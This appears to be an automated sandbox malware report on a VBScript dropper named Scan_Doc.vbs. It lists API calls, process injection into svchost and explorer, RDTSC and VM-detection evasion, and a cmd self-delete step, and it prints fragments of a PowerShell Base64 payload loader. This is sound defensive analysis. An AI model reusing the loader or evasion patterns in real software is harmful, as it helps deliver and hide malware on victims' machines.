          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A699A0 NtCreateSection,LdrInitializeThunk,3_2_03A699A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_03A69910
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A698F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_03A698F0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69860 NtQuerySystemInformation,LdrInitializeThunk,3_2_03A69860
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69840 NtDelayExecution,LdrInitializeThunk,3_2_03A69840
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A697A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_03A697A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69780 NtMapViewOfSection,LdrInitializeThunk,3_2_03A69780
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69710 NtQueryInformationToken,LdrInitializeThunk,3_2_03A69710
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A696E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03A696E0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03A69660
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A695D0 NtClose,LdrInitializeThunk,3_2_03A695D0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69540 NtReadFile,LdrInitializeThunk,3_2_03A69540
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A6A3B0 NtGetContextThread,3_2_03A6A3B0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69B00 NtSetValueKey,3_2_03A69B00
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69A80 NtOpenDirectoryObject,3_2_03A69A80
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69A10 NtQuerySection,3_2_03A69A10
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A699D0 NtCreateProcessEx,3_2_03A699D0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69950 NtQueueApcThread,3_2_03A69950
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A698A0 NtWriteVirtualMemory,3_2_03A698A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69820 NtEnumerateKey,3_2_03A69820
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A6B040 NtSuspendThread,3_2_03A6B040
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69FE0 NtCreateMutant,3_2_03A69FE0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69730 NtQueryVirtualMemory,3_2_03A69730
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A6A710 NtOpenProcessToken,3_2_03A6A710
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69760 NtOpenProcess,3_2_03A69760
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69770 NtSetInformationFile,3_2_03A69770
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A6A770 NtOpenThread,3_2_03A6A770
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A696D0 NtCreateKey,3_2_03A696D0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69610 NtEnumerateValueKey,3_2_03A69610
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69670 NtQueryInformationProcess,3_2_03A69670
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69650 NtQueryValueKey,3_2_03A69650
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A695F0 NtQueryInformationFile,3_2_03A695F0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69520 NtWaitForSingleObject,3_2_03A69520
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A6AD30 NtSetContextThread,3_2_03A6AD30
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69560 NtWriteFile,3_2_03A69560
          Source: C:\Windows\explorer.exe Code function: 4_2_07555E12 NtProtectVirtualMemory,4_2_07555E12
          Source: C:\Windows\explorer.exe Code function: 4_2_07554232 NtCreateFile,4_2_07554232
          Source: C:\Windows\explorer.exe Code function: 4_2_07555E0A NtProtectVirtualMemory,4_2_07555E0A
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599840 NtDelayExecution,LdrInitializeThunk,7_2_04599840
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599860 NtQuerySystemInformation,LdrInitializeThunk,7_2_04599860
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599540 NtReadFile,LdrInitializeThunk,7_2_04599540
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_04599910
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_045995D0 NtClose,LdrInitializeThunk,7_2_045995D0
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_045999A0 NtCreateSection,LdrInitializeThunk,7_2_045999A0
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599A50 NtCreateFile,LdrInitializeThunk,7_2_04599A50
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599650 NtQueryValueKey,LdrInitializeThunk,7_2_04599650
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04599660
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_045996D0 NtCreateKey,LdrInitializeThunk,7_2_045996D0
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_045996E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_045996E0
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599710 NtQueryInformationToken,LdrInitializeThunk,7_2_04599710
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599FE0 NtCreateMutant,LdrInitializeThunk,7_2_04599FE0
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599780 NtMapViewOfSection,LdrInitializeThunk,7_2_04599780
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0459B040 NtSuspendThread,7_2_0459B040
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599820 NtEnumerateKey,7_2_04599820
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_045998F0 NtReadVirtualMemory,7_2_045998F0
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_045998A0 NtWriteVirtualMemory,7_2_045998A0
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599950 NtQueueApcThread,7_2_04599950
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599560 NtWriteFile,7_2_04599560
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0459AD30 NtSetContextThread,7_2_0459AD30
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599520 NtWaitForSingleObject,7_2_04599520
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_045999D0 NtCreateProcessEx,7_2_045999D0
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_045995F0 NtQueryInformationFile,7_2_045995F0
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599670 NtQueryInformationProcess,7_2_04599670
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599610 NtEnumerateValueKey,7_2_04599610
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599A10 NtQuerySection,7_2_04599A10
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599A00 NtProtectVirtualMemory,7_2_04599A00
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599A20 NtResumeThread,7_2_04599A20
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599A80 NtOpenDirectoryObject,7_2_04599A80
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599770 NtSetInformationFile,7_2_04599770
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0459A770 NtOpenThread,7_2_0459A770
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599760 NtOpenProcess,7_2_04599760
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0459A710 NtOpenProcessToken,7_2_0459A710
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599B00 NtSetValueKey,7_2_04599B00
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_04599730 NtQueryVirtualMemory,7_2_04599730
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0459A3B0 NtGetContextThread,7_2_0459A3B0
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_045997A0 NtUnmapViewOfSection,7_2_045997A0
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_001BA350 NtCreateFile,7_2_001BA350
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_001BA400 NtReadFile,7_2_001BA400
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_001BA480 NtClose,7_2_001BA480
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_001BA530 NtAllocateVirtualMemory,7_2_001BA530
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_001BA34A NtCreateFile,7_2_001BA34A
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_001BA3FA NtReadFile,7_2_001BA3FA
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_001BA47D NtClose,7_2_001BA47D
          Source: Scan_Doc.vbs Initial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Doc.vbs"
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('[Base64 payload removed]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_io4xzztc.p5s.ps1
          Source: classification engineClassification label: mal100.troj.evad.winVBS@11/4@10/6
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_01
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Doc.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\cmmon32.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000004.00000000.426705932.00007FFC1B351000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000004.00000000.426705932.00007FFC1B351000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: cmmon32.pdb source: svchost.exe, 00000003.00000003.434203339.0000000003417000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.434765760.0000000003870000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901605087.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: E:\Folders\Crypter bypass all and vbs e js 13-16-2023 original\Crypter bypass all and vbs e js\Crypter bypass all and vbs e js\Rump Offline new modifiqued\Rump Offline new\bin\Release\obfuscated\Fiber.pdb source: powershell.exe, 00000001.00000002.392901894.00000210918A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.398867984.00000210A9B40000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: svchost.exe, 00000003.00000003.434203339.0000000003417000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.434765760.0000000003870000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901605087.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.391679836.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.434919800.0000000003B1F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.392837490.0000000003800000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000003.436155805.0000000004398000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000003.434602736.00000000041F8000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.391679836.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.434919800.0000000003B1F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.392837490.0000000003800000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000007.00000003.436155805.0000000004398000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000003.434602736.00000000041F8000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 00000004.00000000.426705932.00007FFC1B351000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: svchost.pdb source: cmmon32.exe, 00000007.00000002.902659095.0000000004A5F000.00000004.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901229697.00000000006B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: cmmon32.exe, 00000007.00000002.902659095.0000000004A5F000.00000004.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901229697.00000000006B4000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SystemDrive%\");IWshShell3.ExpandEnvironmentStrings("%SystemRoot%\");IWshShell3.CurrentDirectory();IHost.ScriptName();IFileSystem3.GetParentFolderName("C:\Windows\system32\Scan_Doc.vbs");IHost.ScriptName();IFileSystem3.GetFileName("Scan_Doc.vbs");IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAA", "false")
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJ
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417099 push 35320B40h; retf 3_2_004170A1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416B6F push edi; iretd 3_2_00416B7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416C07 pushfd ; retf 3_2_00416C1A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041D4F2 push eax; ret 3_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041D4FB push eax; ret 3_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041D4A5 push eax; ret 3_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041D55C push eax; ret 3_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004166CB pushfd ; ret 3_2_004166CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A7D0D1 push ecx; ret 3_2_03A7D0E4
          Source: C:\Windows\explorer.exeCode function: 4_2_07557B1E push esp; retn 0000h4_2_07557B1F
          Source: C:\Windows\explorer.exeCode function: 4_2_07557B02 push esp; retn 0000h4_2_07557B03
          Source: C:\Windows\explorer.exeCode function: 4_2_075579B5 push esp; retn 0000h4_2_07557AE7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045AD0D1 push ecx; ret 7_2_045AD0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001B7099 push 35320B40h; retf 7_2_001B70A1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001B6B6F push edi; iretd 7_2_001B6B7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001B6C07 pushfd ; retf 7_2_001B6C1A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BD4A5 push eax; ret 7_2_001BD4F8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BD4FB push eax; ret 7_2_001BD562
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BD4F2 push eax; ret 7_2_001BD4F8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BD55C push eax; ret 7_2_001BD562
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001B66CB pushfd ; ret 7_2_001B66CC

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xED
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000001A9904 second address: 00000000001A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000001A9B6E second address: 00000000001A9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-7085
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4700Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6096Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 1848Thread sleep count: 50 > 30
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 1848Thread sleep time: -100000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00409AA0 rdtsc 3_2_00409AA0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3249
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 858
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 876
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 8.2 %
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: wscript.exe, 00000000.00000003.382882142.0000012C24B44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378800384.0000012C24B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378433462.0000012C24B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382422308.0000012C22C1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382601236.0000012C24D81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382275127.0000012C22C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382485422.0000012C24C81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd = "cmd /c wevtutil epl ""Microsoft-Windows-Hyper-V-VMMS-Networking"" " & vmmslogFileName
          Source: wscript.exe, 00000000.00000003.382485422.0000012C24C81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "$output += ""(Get-VMNetworkAdapter -all)""; " & _
          Source: explorer.exe, 00000004.00000003.573784985.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: wscript.exe, 00000000.00000003.382882142.0000012C24B44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378800384.0000012C24B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378433462.0000012C24B43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" ?
          Source: wscript.exe, 00000000.00000003.378709397.0000012C249D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" = Kp
          Source: wscript.exe, 00000000.00000003.382882142.0000012C24B44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378800384.0000012C24B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378433462.0000012C24B43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"
          Source: explorer.exe, 00000004.00000003.570659470.000000000929B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.571137211.000000000929B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.575365644.00000000092B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548887888.000000000929B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548525209.000000000929B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWfy
          Source: wscript.exe, 00000000.00000003.382882142.0000012C24B44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378800384.0000012C24B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378433462.0000012C24B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382422308.0000012C22C1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382601236.0000012C24D81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382275127.0000012C22C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382485422.0000012C24C81000.00000004.00000020.00020000.00000000.sdmp
          Binary or memory string: cmd = "cmd /c wevtutil epl System /q:""*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"" " & vmswitchlogFileName
          Source: wscript.exe, 00000000.00000003.378709397.0000012C249D4000.00000004.00000020.00020000.00000000.sdmp
          Binary or memory string: *$output += "(Get-VMNetworkAdapter -all)";
          Source: cmmon32.exe, 00000007.00000002.901229697.0000000000706000.00000004.00000020.00020000.00000000.sdmp
          Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000002.905466337.0000000007166000.00000004.00000001.00020000.00000000.sdmp
          Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000003.573784985.00000000090D8000.00000004.00000001.00020000.00000000.sdmp
          Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000003.573784985.00000000090D8000.00000004.00000001.00020000.00000000.sdmp
          Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000004.00000003.573784985.0000000008FE8000.00000004.00000001.00020000.00000000.sdmp
          Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000004.00000003.573784985.00000000090D8000.00000004.00000001.00020000.00000000.sdmp
          Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60202a0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir?
          Source: explorer.exe, 00000004.00000000.397125931.0000000005063000.00000004.00000001.00020000.00000000.sdmp
          Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000004.00000000.405024865.00000000090D8000.00000004.00000001.00020000.00000000.sdmp
